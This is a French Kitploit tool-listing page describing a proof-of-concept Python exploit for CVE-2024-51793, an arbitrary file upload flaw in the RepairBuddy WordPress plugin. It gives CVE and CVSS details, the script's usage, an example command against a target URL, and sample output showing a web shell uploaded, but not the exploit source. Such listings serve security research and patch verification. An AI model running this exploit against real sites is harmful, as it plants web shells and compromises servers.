Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-51793 — Plugin WordPress RepairBuddy <= 3.8115 - Vulnérabilité de téléchargement de fichier arbitraire | Kitploit
Outils/GitHubGitHub/nxploited/cve-2024-51793
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'Intrusion
GitHubnxploited/cve-2024-51793

CVE-2024-51793

Plugin WordPress RepairBuddy <= 3.8115 - Vulnérabilité de téléchargement de fichier arbitraire

Voir le dépôt
1il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🛡️ Exploit du plugin WordPress RepairBuddy

📜 Informations CVE

CVE-ID: CVE-2024-51793
Publiée: 2024-11-11
Mise à jour: 2024-11-11
Titre: Plugin WordPress RepairBuddy <= 3.8115 - Vulnérabilité de téléchargement de fichier arbitraire
Description:
La vulnérabilité de téléchargement sans restriction de fichier avec un type dangereux dans Webful Creations Computer Repair Shop permet de télécharger un shell web sur un serveur web. Ce problème affecte Computer Repair Shop : de n/a jusqu'à 3.8115.

CWE:

  • CWE-434 : Téléchargement non restreint de fichier avec type dangereux

CVSS:

  • Score : 10.0 (CRITIQUE)
  • Version : 3.1
  • Chaîne vectorielle : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

📋 Description

Il s'agit d'un exploit de preuve de concept pour la vulnérabilité de téléchargement de fichier arbitraire dans le plugin WordPress RepairBuddy versions <= 3.8115. L'exploit permet à un attaquant de télécharger un shell web sur le serveur vulnérable.

⚙️ Prérequis

  • Python 3.x
  • Bibliothèque requests (pip install requests)

🚀 Utilisation

root@kitploit:~
usage: 
CVE-2024-51793.py [-h] -u URL [-shell SHELL]

WordPress RepairBuddy plugin <= 3.8115 - Arbitrary File Upload vulnerability # By Nxploited ,Khaled alenazi.

options:
  -h, --help     show this help message and exit
  -u, --url URL  Target URL
  -shell SHELL   Shell code to upload

📖 Exemple

root@kitploit:~
python 
CVE-2024-51793.py -u http://target.com/wordpress

📝 Sortie

root@kitploit:~
Exploit By : Nxploit Khaled Alenazi,

🎯 The site is vulnerable. Proceeding with the exploit...
Response: "<a href=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" target=\"_blank\"><\/a><input type=\"hidden\" name=\"repairBuddAttachment_file[]\" value=\"http:\/\/target\/wordpress\/wp-content\/repairbuddy_uploads\/reciepts\/2025_03_23_22_43_50nxploit.php\" \/>"
✅ Shell uploaded successfully.
🔗 Shell URL: http://target/wordpress/wp-content/repairbuddy_uploads/reciepts/2025_03_23_22_43_50nxploit.php

👨‍💻 Auteur

Exploit par : Nxploited, Khaled Alenazi

Télécharger l’outil